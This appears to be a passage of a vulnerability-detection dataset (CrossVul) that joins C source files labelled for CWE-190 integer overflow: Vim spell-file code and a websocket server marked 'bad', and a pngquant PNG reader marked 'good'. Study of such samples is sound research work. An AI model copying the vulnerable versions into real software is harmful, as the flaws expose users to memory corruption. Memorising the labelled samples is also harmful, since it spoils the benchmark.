fd = mch_fopen((char *)fname, "a");
}
}
if (fd == NULL)
EMSG2(_(e_notopen), fname);
else
{
if (bad)
fprintf(fd, "%.*s/!\n", len, word);
else
fprintf(fd, "%.*s\n", len, word);
fclose(fd);
home_replace(NULL, fname, NameBuff, MAXPATHL, TRUE);
smsg((char_u *)_("Word '%.*s' added to %s"), len, word, NameBuff);
}
}
if (fd != NULL)
{
/* Update the .add.spl file. */
mkspell(1, &fname, FALSE, TRUE, TRUE);
/* If the .add file is edited somewhere, reload it. */
if (buf != NULL)
buf_reload(buf, buf->b_orig_mode);
redraw_all_later(SOME_VALID);
}
vim_free(fnamebuf);
}
/*
* Initialize 'spellfile' for the current buffer.
*/
static void
init_spellfile(void)
{
char_u *buf;
int l;
char_u *fname;
char_u *rtp;
char_u *lend;
int aspath = FALSE;
char_u *lstart = curbuf->b_s.b_p_spl;
if (*curwin->w_s->b_p_spl != NUL && curwin->w_s->b_langp.ga_len > 0)
{
buf = alloc(MAXPATHL);
if (buf == NULL)
return;
/* Find the end of the language name. Exclude the region. If there
* is a path separator remember the start of the tail. */
for (lend = curwin->w_s->b_p_spl; *lend != NUL
&& vim_strchr((char_u *)",._", *lend) == NULL; ++lend)
if (vim_ispathsep(*lend))
{
aspath = TRUE;
lstart = lend + 1;
}
/* Loop over all entries in 'runtimepath'. Use the first one where we
* are allowed to write. */
rtp = p_rtp;
while (*rtp != NUL)
{
if (aspath)
/* Use directory of an entry with path, e.g., for
* "/dir/lg.utf-8.spl" use "/dir". */
vim_strncpy(buf, curbuf->b_s.b_p_spl,
lstart - curbuf->b_s.b_p_spl - 1);
else
/* Copy the path from 'runtimepath' to buf[]. */
copy_option_part(&rtp, buf, MAXPATHL, ",");
if (filewritable(buf) == 2)
{
/* Use the first language name from 'spelllang' and the
* encoding used in the first loaded .spl file. */
if (aspath)
vim_strncpy(buf, curbuf->b_s.b_p_spl,
lend - curbuf->b_s.b_p_spl);
else
{
/* Create the "spell" directory if it doesn't exist yet. */
l = (int)STRLEN(buf);
vim_snprintf((char *)buf + l, MAXPATHL - l, "/spell");
if (filewritable(buf) != 2)
vim_mkdir(buf, 0755);
l = (int)STRLEN(buf);
vim_snprintf((char *)buf + l, MAXPATHL - l,
"/%.*s", (int)(lend - lstart), lstart);
}
l = (int)STRLEN(buf);
fname = LANGP_ENTRY(curwin->w_s->b_langp, 0)
->lp_slang->sl_fname;
vim_snprintf((char *)buf + l, MAXPATHL - l, ".%s.add",
fname != NULL
&& strstr((char *)gettail(fname), ".ascii.") != NULL
? (char_u *)"ascii" : spell_enc());
set_option_value((char_u *)"spellfile", 0L, buf, OPT_LOCAL);
break;
}
aspath = FALSE;
}
vim_free(buf);
}
}
/*
* Set the spell character tables from strings in the affix file.
*/
static int
set_spell_chartab(char_u *fol, char_u *low, char_u *upp)
{
/* We build the new tables here first, so that we can compare with the
* previous one. */
spelltab_T new_st;
char_u *pf = fol, *pl = low, *pu = upp;
int f, l, u;
clear_spell_chartab(&new_st);
while (*pf != NUL)
{
if (*pl == NUL || *pu == NUL)
{
EMSG(_(e_affform));
return FAIL;
}
#ifdef FEAT_MBYTE
f = mb_ptr2char_adv(&pf);
l = mb_ptr2char_adv(&pl);
u = mb_ptr2char_adv(&pu);
#else
f = *pf++;
l = *pl++;
u = *pu++;
#endif
/* Every character that appears is a word character. */
if (f < 256)
new_st.st_isw[f] = TRUE;
if (l < 256)
new_st.st_isw[l] = TRUE;
if (u < 256)
new_st.st_isw[u] = TRUE;
/* if "LOW" and "FOL" are not the same the "LOW" char needs
* case-folding */
if (l < 256 && l != f)
{
if (f >= 256)
{
EMSG(_(e_affrange));
return FAIL;
}
new_st.st_fold[l] = f;
}
/* if "UPP" and "FOL" are not the same the "UPP" char needs
* case-folding, it's upper case and the "UPP" is the upper case of
* "FOL" . */
if (u < 256 && u != f)
{
if (f >= 256)
{
EMSG(_(e_affrange));
return FAIL;
}
new_st.st_fold[u] = f;
new_st.st_isu[u] = TRUE;
new_st.st_upper[f] = u;
}
}
if (*pl != NUL || *pu != NUL)
{
EMSG(_(e_affform));
return FAIL;
}
return set_spell_finish(&new_st);
}
/*
* Set the spell character tables from strings in the .spl file.
*/
static void
set_spell_charflags(
char_u *flags,
int cnt, /* length of "flags" */
char_u *fol)
{
/* We build the new tables here first, so that we can compare with the
* previous one. */
spelltab_T new_st;
int i;
char_u *p = fol;
int c;
clear_spell_chartab(&new_st);
for (i = 0; i < 128; ++i)
{
if (i < cnt)
{
new_st.st_isw[i + 128] = (flags[i] & CF_WORD) != 0;
new_st.st_isu[i + 128] = (flags[i] & CF_UPPER) != 0;
}
if (*p != NUL)
{
#ifdef FEAT_MBYTE
c = mb_ptr2char_adv(&p);
#else
c = *p++;
#endif
new_st.st_fold[i + 128] = c;
if (i + 128 != c && new_st.st_isu[i + 128] && c < 256)
new_st.st_upper[c] = i + 128;
}
}
(void)set_spell_finish(&new_st);
}
static int
set_spell_finish(spelltab_T *new_st)
{
int i;
if (did_set_spelltab)
{
/* check that it's the same table */
for (i = 0; i < 256; ++i)
{
if (spelltab.st_isw[i] != new_st->st_isw[i]
|| spelltab.st_isu[i] != new_st->st_isu[i]
|| spelltab.st_fold[i] != new_st->st_fold[i]
|| spelltab.st_upper[i] != new_st->st_upper[i])
{
EMSG(_("E763: Word characters differ between spell files"));
return FAIL;
}
}
}
else
{
/* copy the new spelltab into the one being used */
spelltab = *new_st;
did_set_spelltab = TRUE;
}
return OK;
}
/*
* Write the table with prefix conditions to the .spl file.
* When "fd" is NULL only count the length of what is written.
*/
static int
write_spell_prefcond(FILE *fd, garray_T *gap)
{
int i;
char_u *p;
int len;
int totlen;
size_t x = 1; /* collect return value of fwrite() */
if (fd != NULL)
put_bytes(fd, (long_u)gap->ga_len, 2); /* <prefcondcnt> */
totlen = 2 + gap->ga_len; /* length of <prefcondcnt> and <condlen> bytes */
for (i = 0; i < gap->ga_len; ++i)
{
/* <prefcond> : <condlen> <condstr> */
p = ((char_u **)gap->ga_data)[i];
if (p != NULL)
{
len = (int)STRLEN(p);
if (fd != NULL)
{
fputc(len, fd);
x &= fwrite(p, (size_t)len, (size_t)1, fd);
}
totlen += len;
}
else if (fd != NULL)
fputc(0, fd);
}
return totlen;
}
/*
* Use map string "map" for languages "lp".
*/
static void
set_map_str(slang_T *lp, char_u *map)
{
char_u *p;
int headc = 0;
int c;
int i;
if (*map == NUL)
{
lp->sl_has_map = FALSE;
return;
}
lp->sl_has_map = TRUE;
/* Init the array and hash tables empty. */
for (i = 0; i < 256; ++i)
lp->sl_map_array[i] = 0;
#ifdef FEAT_MBYTE
hash_init(&lp->sl_map_hash);
#endif
/*
* The similar characters are stored separated with slashes:
* "aaa/bbb/ccc/". Fill sl_map_array[c] with the character before c and
* before the same slash. For characters above 255 sl_map_hash is used.
*/
for (p = map; *p != NUL; )
{
#ifdef FEAT_MBYTE
c = mb_cptr2char_adv(&p);
#else
c = *p++;
#endif
if (c == '/')
headc = 0;
else
{
if (headc == 0)
headc = c;
#ifdef FEAT_MBYTE
/* Characters above 255 don't fit in sl_map_array[], put them in
* the hash table. Each entry is the char, a NUL the headchar and
* a NUL. */
if (c >= 256)
{
int cl = mb_char2len(c);
int headcl = mb_char2len(headc);
char_u *b;
hash_T hash;
hashitem_T *hi;
b = alloc((unsigned)(cl + headcl + 2));
if (b == NULL)
return;
mb_char2bytes(c, b);
b[cl] = NUL;
mb_char2bytes(headc, b + cl + 1);
b[cl + 1 + headcl] = NUL;
hash = hash_hash(b);
hi = hash_lookup(&lp->sl_map_hash, b, hash);
if (HASHITEM_EMPTY(hi))
hash_add_item(&lp->sl_map_hash, hi, b, hash);
else
{
/* This should have been checked when generating the .spl
* file. */
EMSG(_("E783: duplicate char in MAP entry"));
vim_free(b);
}
}
else
#endif
lp->sl_map_array[c] = headc;
}
}
}
#endif /* FEAT_SPELL */
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3153_0 |
crossvul-cpp_data_good_5162_0 | /*---------------------------------------------------------------------------
pngquant: RGBA -> RGBA-palette quantization program rwpng.c
---------------------------------------------------------------------------
© 1998-2000 by Greg Roelofs.
© 2009-2015 by Kornel Lesiński.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
#include "png.h" /* if this include fails, you need to install libpng (e.g. libpng-devel package) and run ./configure */
#include "rwpng.h"
#if USE_LCMS
#include "lcms2.h"
#endif
#ifndef Z_BEST_COMPRESSION
#define Z_BEST_COMPRESSION 9
#endif
#ifndef Z_BEST_SPEED
#define Z_BEST_SPEED 1
#endif
#ifdef _OPENMP
#include <omp.h>
#else
#define omp_get_max_threads() 1
#endif
#if PNG_LIBPNG_VER < 10500
typedef png_const_charp png_const_bytep;
#endif
static void rwpng_error_handler(png_structp png_ptr, png_const_charp msg);
int rwpng_read_image24_cocoa(FILE *infile, png24_image *mainprog_ptr);
void rwpng_version_info(FILE *fp)
{
const char *pngver = png_get_header_ver(NULL);
#if USE_COCOA
fprintf(fp, " Color profiles are supported via Cocoa. Using libpng %s.\n", pngver);
#elif USE_LCMS
fprintf(fp, " Color profiles are supported via Little CMS. Using libpng %s.\n", pngver);
#else
fprintf(fp, " Compiled with no support for color profiles. Using libpng %s.\n", pngver);
#endif
#if PNG_LIBPNG_VER < 10600
if (strcmp(pngver, "1.3.") < 0) {
fputs("\nWARNING: Your version of libpng is outdated and may produce corrupted files.\n"
"Please recompile pngquant with the current version of libpng (1.6 or later).\n", fp);
} else if (strcmp(pngver, "1.6.") < 0) {
#if defined(PNG_UNKNOWN_CHUNKS_SUPPORTED)
fputs("\nWARNING: Your version of libpng is old and has buggy support for custom chunks.\n"
"Please recompile pngquant with the current version of libpng (1.6 or later).\n", fp);
#endif
}
#endif
}
struct rwpng_read_data {
FILE *const fp;
png_size_t bytes_read;
};
#if !USE_COCOA
static void user_read_data(png_structp png_ptr, png_bytep data, png_size_t length)
{
struct rwpng_read_data *read_data = (struct rwpng_read_data *)png_get_io_ptr(png_ptr);
png_size_t read = fread(data, 1, length, read_data->fp);
if (!read) {
png_error(png_ptr, "Read error");
}
read_data->bytes_read += read;
}
#endif
struct rwpng_write_state {
FILE *outfile;
png_size_t maximum_file_size;
png_size_t bytes_written;
pngquant_error retval;
};
static void user_write_data(png_structp png_ptr, png_bytep data, png_size_t length)
{
struct rwpng_write_state *write_state = (struct rwpng_write_state *)png_get_io_ptr(png_ptr);
if (SUCCESS != write_state->retval) {
return;
}
if (!fwrite(data, length, 1, write_state->outfile)) {
write_state->retval = CANT_WRITE_ERROR;
}
write_state->bytes_written += length;
}
static void user_flush_data(png_structp png_ptr)
{
// libpng never calls this :(
}
static png_bytepp rwpng_create_row_pointers(png_infop info_ptr, png_structp png_ptr, unsigned char *base, unsigned int height, png_size_t rowbytes)
{
if (!rowbytes) {
rowbytes = png_get_rowbytes(png_ptr, info_ptr);
}
png_bytepp row_pointers = malloc(height * sizeof(row_pointers[0]));
if (!row_pointers) return NULL;
for(size_t row = 0; row < height; row++) {
row_pointers[row] = base + row * rowbytes;
}
return row_pointers;
}
#if !USE_COCOA
static int read_chunk_callback(png_structp png_ptr, png_unknown_chunkp in_chunk)
{
if (0 == memcmp("iCCP", in_chunk->name, 5) ||
0 == memcmp("cHRM", in_chunk->name, 5) ||
0 == memcmp("gAMA", in_chunk->name, 5)) {
return 0; // not handled
}
struct rwpng_chunk **head = (struct rwpng_chunk **)png_get_user_chunk_ptr(png_ptr);
struct rwpng_chunk *chunk = malloc(sizeof(struct rwpng_chunk));
memcpy(chunk->name, in_chunk->name, 5);
chunk->size = in_chunk->size;
chunk->location = in_chunk->location;
chunk->data = in_chunk->size ? malloc(in_chunk->size) : NULL;
if (in_chunk->size) {
memcpy(chunk->data, in_chunk->data, in_chunk->size);
}
chunk->next = *head;
*head = chunk;
return 1; // marks as "handled", libpng won't store it
}
#endif
/*
retval:
0 = success
21 = bad sig
22 = bad IHDR
24 = insufficient memory
25 = libpng error (via longjmp())
26 = wrong PNG color type (no alpha channel)
*/
#if !USE_COCOA
static void rwpng_warning_stderr_handler(png_structp png_ptr, png_const_charp msg) {
fprintf(stderr, " libpng warning: %s\n", msg);
}
static void rwpng_warning_silent_handler(png_structp png_ptr, png_const_charp msg) {
}
static pngquant_error rwpng_read_image24_libpng(FILE *infile, png24_image *mainprog_ptr, int verbose)
{
png_structp png_ptr = NULL;
png_infop info_ptr = NULL;
png_size_t rowbytes;
int color_type, bit_depth;
png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING, mainprog_ptr,
rwpng_error_handler, verbose ? rwpng_warning_stderr_handler : rwpng_warning_silent_handler);
if (!png_ptr) {
return PNG_OUT_OF_MEMORY_ERROR; /* out of memory */
}
info_ptr = png_create_info_struct(png_ptr);
if (!info_ptr) {
png_destroy_read_struct(&png_ptr, NULL, NULL);
return PNG_OUT_OF_MEMORY_ERROR; /* out of memory */
}
/* setjmp() must be called in every function that calls a non-trivial
* libpng function */
if (setjmp(mainprog_ptr->jmpbuf)) {
png_destroy_read_struct(&png_ptr, &info_ptr, NULL);
return LIBPNG_FATAL_ERROR; /* fatal libpng error (via longjmp()) */
}
#if defined(PNG_SKIP_sRGB_CHECK_PROFILE) && defined(PNG_SET_OPTION_SUPPORTED)
png_set_option(png_ptr, PNG_SKIP_sRGB_CHECK_PROFILE, PNG_OPTION_ON);
#endif
#if PNG_LIBPNG_VER >= 10500 && defined(PNG_UNKNOWN_CHUNKS_SUPPORTED)
/* copy standard chunks too */
png_set_keep_unknown_chunks(png_ptr, PNG_HANDLE_CHUNK_IF_SAFE, (png_const_bytep)"pHYs\0iTXt\0tEXt\0zTXt", 4);
#endif
png_set_read_user_chunk_fn(png_ptr, &mainprog_ptr->chunks, read_chunk_callback);
struct rwpng_read_data read_data = {infile, 0};
png_set_read_fn(png_ptr, &read_data, user_read_data);
png_read_info(png_ptr, info_ptr); /* read all PNG info up to image data */
/* alternatively, could make separate calls to png_get_image_width(),
* etc., but want bit_depth and color_type for later [don't care about
* compression_type and filter_type => NULLs] */
png_get_IHDR(png_ptr, info_ptr, &mainprog_ptr->width, &mainprog_ptr->height,
&bit_depth, &color_type, NULL, NULL, NULL);
/* expand palette images to RGB, low-bit-depth grayscale images to 8 bits,
* transparency chunks to full alpha channel; strip 16-bit-per-sample
* images to 8 bits per sample; and convert grayscale to RGB[A] */
/* GRR TO DO: preserve all safe-to-copy ancillary PNG chunks */
if (!(color_type & PNG_COLOR_MASK_ALPHA)) {
#ifdef PNG_READ_FILLER_SUPPORTED
png_set_expand(png_ptr);
png_set_filler(png_ptr, 65535L, PNG_FILLER_AFTER);
#else
fprintf(stderr, "pngquant readpng: image is neither RGBA nor GA\n");
png_destroy_read_struct(&png_ptr, &info_ptr, NULL);
mainprog_ptr->retval = WRONG_INPUT_COLOR_TYPE;
return mainprog_ptr->retval;
#endif
}
if (bit_depth == 16) {
png_set_strip_16(png_ptr);
}
if (!(color_type & PNG_COLOR_MASK_COLOR)) {
png_set_gray_to_rgb(png_ptr);
}
/* get source gamma for gamma correction, or use sRGB default */
double gamma = 0.45455;
if (png_get_valid(png_ptr, info_ptr, PNG_INFO_sRGB)) {
mainprog_ptr->input_color = RWPNG_SRGB;
mainprog_ptr->output_color = RWPNG_SRGB;
} else {
png_get_gAMA(png_ptr, info_ptr, &gamma);
if (gamma > 0 && gamma <= 1.0) {
mainprog_ptr->input_color = RWPNG_GAMA_ONLY;
mainprog_ptr->output_color = RWPNG_GAMA_ONLY;
} else {
fprintf(stderr, "pngquant readpng: ignored out-of-range gamma %f\n", gamma);
mainprog_ptr->input_color = RWPNG_NONE;
mainprog_ptr->output_color = RWPNG_NONE;
gamma = 0.45455;
}
}
mainprog_ptr->gamma = gamma;
png_set_interlace_handling(png_ptr);
/* all transformations have been registered; now update info_ptr data,
* get rowbytes and channels, and allocate image memory */
png_read_update_info(png_ptr, info_ptr);
rowbytes = png_get_rowbytes(png_ptr, info_ptr);
// For overflow safety reject images that won't fit in 32-bit
if (rowbytes > INT_MAX/mainprog_ptr->height) {
png_destroy_read_struct(&png_ptr, &info_ptr, NULL);
return PNG_OUT_OF_MEMORY_ERROR;
}
if ((mainprog_ptr->rgba_data = malloc(rowbytes * mainprog_ptr->height)) == NULL) {
fprintf(stderr, "pngquant readpng: unable to allocate image data\n");
png_destroy_read_struct(&png_ptr, &info_ptr, NULL);
return PNG_OUT_OF_MEMORY_ERROR;
}
png_bytepp row_pointers = rwpng_create_row_pointers(info_ptr, png_ptr, mainprog_ptr->rgba_data, mainprog_ptr->height, 0);
/* now we can go ahead and just read the whole image */
png_read_image(png_ptr, row_pointers);
/* and we're done! (png_read_end() can be omitted if no processing of
* post-IDAT text/time/etc. is desired) */
png_read_end(png_ptr, NULL);
#if USE_LCMS
#if PNG_LIBPNG_VER < 10500
png_charp ProfileData;
#else
png_bytep ProfileData;
#endif
png_uint_32 ProfileLen;
cmsHPROFILE hInProfile = NULL;
/* color_type is read from the image before conversion to RGBA */
int COLOR_PNG = color_type & PNG_COLOR_MASK_COLOR;
/* embedded ICC profile */
if (png_get_iCCP(png_ptr, info_ptr, &(png_charp){0}, &(int){0}, &ProfileData, &ProfileLen)) {
hInProfile = cmsOpenProfileFromMem(ProfileData, ProfileLen);
cmsColorSpaceSignature colorspace = cmsGetColorSpace(hInProfile);
/* only RGB (and GRAY) valid for PNGs */
if (colorspace == cmsSigRgbData && COLOR_PNG) {
mainprog_ptr->input_color = RWPNG_ICCP;
mainprog_ptr->output_color = RWPNG_SRGB;
} else {
if (colorspace == cmsSigGrayData && !COLOR_PNG) {
mainprog_ptr->input_color = RWPNG_ICCP_WARN_GRAY;
mainprog_ptr->output_color = RWPNG_SRGB;
}
cmsCloseProfile(hInProfile);
hInProfile = NULL;
}
}
/* build RGB profile from cHRM and gAMA */
if (hInProfile == NULL && COLOR_PNG &&
!png_get_valid(png_ptr, info_ptr, PNG_INFO_sRGB) &&
png_get_valid(png_ptr, info_ptr, PNG_INFO_gAMA) &&
png_get_valid(png_ptr, info_ptr, PNG_INFO_cHRM)) {
cmsCIExyY WhitePoint;
cmsCIExyYTRIPLE Primaries;
png_get_cHRM(png_ptr, info_ptr, &WhitePoint.x, &WhitePoint.y,
&Primaries.Red.x, &Primaries.Red.y,
&Primaries.Green.x, &Primaries.Green.y,
&Primaries.Blue.x, &Primaries.Blue.y);
WhitePoint.Y = Primaries.Red.Y = Primaries.Green.Y = Primaries.Blue.Y = 1.0;
cmsToneCurve *GammaTable[3];
GammaTable[0] = GammaTable[1] = GammaTable[2] = cmsBuildGamma(NULL, 1/gamma);
hInProfile = cmsCreateRGBProfile(&WhitePoint, &Primaries, GammaTable);
cmsFreeToneCurve(GammaTable[0]);
mainprog_ptr->input_color = RWPNG_GAMA_CHRM;
mainprog_ptr->output_color = RWPNG_SRGB;
}
/* transform image to sRGB colorspace */
if (hInProfile != NULL) {
cmsHPROFILE hOutProfile = cmsCreate_sRGBProfile();
cmsHTRANSFORM hTransform = cmsCreateTransform(hInProfile, TYPE_RGBA_8,
hOutProfile, TYPE_RGBA_8,
INTENT_PERCEPTUAL,
omp_get_max_threads() > 1 ? cmsFLAGS_NOCACHE : 0);
#pragma omp parallel for \
if (mainprog_ptr->height*mainprog_ptr->width > 8000) \
schedule(static)
for (unsigned int i = 0; i < mainprog_ptr->height; i++) {
/* It is safe to use the same block for input and output,
when both are of the same TYPE. */
cmsDoTransform(hTransform, row_pointers[i],
row_pointers[i],
mainprog_ptr->width);
}
cmsDeleteTransform(hTransform);
cmsCloseProfile(hOutProfile);
cmsCloseProfile(hInProfile);
mainprog_ptr->gamma = 0.45455;
}
#endif
png_destroy_read_struct(&png_ptr, &info_ptr, NULL);
mainprog_ptr->file_size = read_data.bytes_read;
mainprog_ptr->row_pointers = (unsigned char **)row_pointers;
return SUCCESS;
}
#endif
static void rwpng_free_chunks(struct rwpng_chunk *chunk) {
if (!chunk) return;
rwpng_free_chunks(chunk->next);
free(chunk->data);
free(chunk);
}
void rwpng_free_image24(png24_image *image)
{
free(image->row_pointers);
image->row_pointers = NULL;
free(image->rgba_data);
image->rgba_data = NULL;
rwpng_free_chunks(image->chunks);
image->chunks = NULL;
}
void rwpng_free_image8(png8_image *image)
{
free(image->indexed_data);
image->indexed_data = NULL;
free(image->row_pointers);
image->row_pointers = NULL;
rwpng_free_chunks(image->chunks);
image->chunks = NULL;
}
pngquant_error rwpng_read_image24(FILE *infile, png24_image *input_image_p, int verbose)
{
#if USE_COCOA
return rwpng_read_image24_cocoa(infile, input_image_p);
#else
return rwpng_read_image24_libpng(infile, input_image_p, verbose);
#endif
}
static pngquant_error rwpng_write_image_init(rwpng_png_image *mainprog_ptr, png_structpp png_ptr_p, png_infopp info_ptr_p, int fast_compression)
{
/* could also replace libpng warning-handler (final NULL), but no need: */
*png_ptr_p = png_create_write_struct(PNG_LIBPNG_VER_STRING, mainprog_ptr, rwpng_error_handler, NULL);
if (!(*png_ptr_p)) {
return LIBPNG_INIT_ERROR; /* out of memory */
}
*info_ptr_p = png_create_info_struct(*png_ptr_p);
if (!(*info_ptr_p)) {
png_destroy_write_struct(png_ptr_p, NULL);
return LIBPNG_INIT_ERROR; /* out of memory */
}
/* setjmp() must be called in every function that calls a PNG-writing
* libpng function, unless an alternate error handler was installed--
* but compatible error handlers must either use longjmp() themselves
* (as in this program) or exit immediately, so here we go: */
if (setjmp(mainprog_ptr->jmpbuf)) {
png_destroy_write_struct(png_ptr_p, info_ptr_p);
return LIBPNG_INIT_ERROR; /* libpng error (via longjmp()) */
}
png_set_compression_level(*png_ptr_p, fast_compression ? Z_BEST_SPEED : Z_BEST_COMPRESSION);
png_set_compression_mem_level(*png_ptr_p, fast_compression ? 9 : 5); // judging by optipng results, smaller mem makes libpng compress slightly better
return SUCCESS;
}
static void rwpng_write_end(png_infopp info_ptr_p, png_structpp png_ptr_p, png_bytepp row_pointers)
{
png_write_info(*png_ptr_p, *info_ptr_p);
png_set_packing(*png_ptr_p);
png_write_image(*png_ptr_p, row_pointers);
png_write_end(*png_ptr_p, NULL);
png_destroy_write_struct(png_ptr_p, info_ptr_p);
}
static void rwpng_set_gamma(png_infop info_ptr, png_structp png_ptr, double gamma, rwpng_color_transform color)
{
if (color != RWPNG_GAMA_ONLY && color != RWPNG_NONE) {
png_set_gAMA(png_ptr, info_ptr, gamma);
}
if (color == RWPNG_SRGB) {
png_set_sRGB(png_ptr, info_ptr, 0); // 0 = Perceptual
}
}
pngquant_error rwpng_write_image8(FILE *outfile, const png8_image *mainprog_ptr)
{
png_structp png_ptr;
png_infop info_ptr;
if (mainprog_ptr->num_palette > 256) return INVALID_ARGUMENT;
pngquant_error retval = rwpng_write_image_init((rwpng_png_image*)mainprog_ptr, &png_ptr, &info_ptr, mainprog_ptr->fast_compression);
if (retval) return retval;
struct rwpng_write_state write_state;
write_state = (struct rwpng_write_state){
.outfile = outfile,
.maximum_file_size = mainprog_ptr->maximum_file_size,
.retval = SUCCESS,
};
png_set_write_fn(png_ptr, &write_state, user_write_data, user_flush_data);
// Palette images generally don't gain anything from filtering
png_set_filter(png_ptr, PNG_FILTER_TYPE_BASE, PNG_FILTER_VALUE_NONE);
rwpng_set_gamma(info_ptr, png_ptr, mainprog_ptr->gamma, mainprog_ptr->output_color);
/* set the image parameters appropriately */
int sample_depth;
#if PNG_LIBPNG_VER > 10400 /* old libpng corrupts files with low depth */
if (mainprog_ptr->num_palette <= 2)
sample_depth = 1;
else if (mainprog_ptr->num_palette <= 4)
sample_depth = 2;
else if (mainprog_ptr->num_palette <= 16)
sample_depth = 4;
else
#endif
sample_depth = 8;
struct rwpng_chunk *chunk = mainprog_ptr->chunks;
int chunk_num=0;
while(chunk) {
png_unknown_chunk pngchunk = {
.size = chunk->size,
.data = chunk->data,
.location = chunk->location,
};
memcpy(pngchunk.name, chunk->name, 5);
png_set_unknown_chunks(png_ptr, info_ptr, &pngchunk, 1);
#if defined(PNG_HAVE_IHDR) && PNG_LIBPNG_VER < 10600
png_set_unknown_chunk_location(png_ptr, info_ptr, chunk_num, pngchunk.location ? pngchunk.location : PNG_HAVE_IHDR);
#endif
chunk = chunk->next;
chunk_num++;
}
png_set_IHDR(png_ptr, info_ptr, mainprog_ptr->width, mainprog_ptr->height,
sample_depth, PNG_COLOR_TYPE_PALETTE,
0, PNG_COMPRESSION_TYPE_DEFAULT,
PNG_FILTER_TYPE_BASE);
png_color palette[256];
png_byte trans[256];
unsigned int num_trans = 0;
for(unsigned int i = 0; i < mainprog_ptr->num_palette; i++) {
palette[i] = (png_color){
.red = mainprog_ptr->palette[i].r,
.green = mainprog_ptr->palette[i].g,
.blue = mainprog_ptr->palette[i].b,
};
trans[i] = mainprog_ptr->palette[i].a;
if (mainprog_ptr->palette[i].a < 255) {
num_trans = i+1;
}
}
png_set_PLTE(png_ptr, info_ptr, palette, mainprog_ptr->num_palette);
if (num_trans > 0) {
png_set_tRNS(png_ptr, info_ptr, trans, num_trans, NULL);
}
rwpng_write_end(&info_ptr, &png_ptr, mainprog_ptr->row_pointers);
if (SUCCESS == write_state.retval && write_state.maximum_file_size && write_state.bytes_written > write_state.maximum_file_size) {
return TOO_LARGE_FILE;
}
return write_state.retval;
}
pngquant_error rwpng_write_image24(FILE *outfile, const png24_image *mainprog_ptr)
{
png_structp png_ptr;
png_infop info_ptr;
pngquant_error retval = rwpng_write_image_init((rwpng_png_image*)mainprog_ptr, &png_ptr, &info_ptr, 0);
if (retval) return retval;
png_init_io(png_ptr, outfile);
rwpng_set_gamma(info_ptr, png_ptr, mainprog_ptr->gamma, mainprog_ptr->output_color);
png_set_IHDR(png_ptr, info_ptr, mainprog_ptr->width, mainprog_ptr->height,
8, PNG_COLOR_TYPE_RGB_ALPHA,
0, PNG_COMPRESSION_TYPE_DEFAULT,
PNG_FILTER_TYPE_BASE);
png_bytepp row_pointers = rwpng_create_row_pointers(info_ptr, png_ptr, mainprog_ptr->rgba_data, mainprog_ptr->height, 0);
rwpng_write_end(&info_ptr, &png_ptr, row_pointers);
free(row_pointers);
return SUCCESS;
}
static void rwpng_error_handler(png_structp png_ptr, png_const_charp msg)
{
rwpng_png_image *mainprog_ptr;
/* This function, aside from the extra step of retrieving the "error
* pointer" (below) and the fact that it exists within the application
* rather than within libpng, is essentially identical to libpng's
* default error handler. The second point is critical: since both
* setjmp() and longjmp() are called from the same code, they are
* guaranteed to have compatible notions of how big a jmp_buf is,
* regardless of whether _BSD_SOURCE or anything else has (or has not)
* been defined. */
fprintf(stderr, " error: %s (libpng failed)\n", msg);
fflush(stderr);
mainprog_ptr = png_get_error_ptr(png_ptr);
if (mainprog_ptr == NULL) abort();
longjmp(mainprog_ptr->jmpbuf, 1);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5162_0 |
crossvul-cpp_data_bad_400_3 | /*
* Description:
* History: yang@haipo.me, 2017/04/26, create
*/
# include <stdbool.h>
# include <openssl/sha.h>
# include "ut_log.h"
# include "ut_misc.h"
# include "ut_base64.h"
# include "ut_ws_svr.h"
struct ws_frame {
uint8_t fin;
uint8_t opcode;
uint64_t payload_len;
void *payload;
};
struct clt_info {
nw_ses *ses;
void *privdata;
double last_activity;
struct http_parser parser;
sds field;
bool field_set;
sds value;
bool value_set;
bool upgrade;
sds remote;
sds url;
sds message;
http_request_t *request;
struct ws_frame frame;
};
static int on_http_message_begin(http_parser* parser)
{
struct clt_info *info = parser->data;
if (info->request)
http_request_release(info->request);
info->request = http_request_new();
if (info->request == NULL) {
return -__LINE__;
}
return 0;
}
static int send_hand_shake_reply(nw_ses *ses, char *protocol, const char *key)
{
unsigned char hash[20];
sds data = sdsnew(key);
data = sdscat(data, "258EAFA5-E914-47DA-95CA-C5AB0DC85B11");
SHA1((const unsigned char *)data, sdslen(data), hash);
sdsfree(data);
sds b4message;
base64_encode(hash, sizeof(hash), &b4message);
http_response_t *response = http_response_new();
http_response_set_header(response, "Upgrade", "websocket");
http_response_set_header(response, "Connection", "Upgrade");
http_response_set_header(response, "Sec-WebSocket-Accept", b4message);
if (protocol) {
http_response_set_header(response, "Sec-WebSocket-Protocol", protocol);
}
response->status = 101;
sds message = http_response_encode(response);
nw_ses_send(ses, message, sdslen(message));
sdsfree(message);
sdsfree(b4message);
return 0;
}
static bool is_good_protocol(const char *protocol_list, const char *protocol)
{
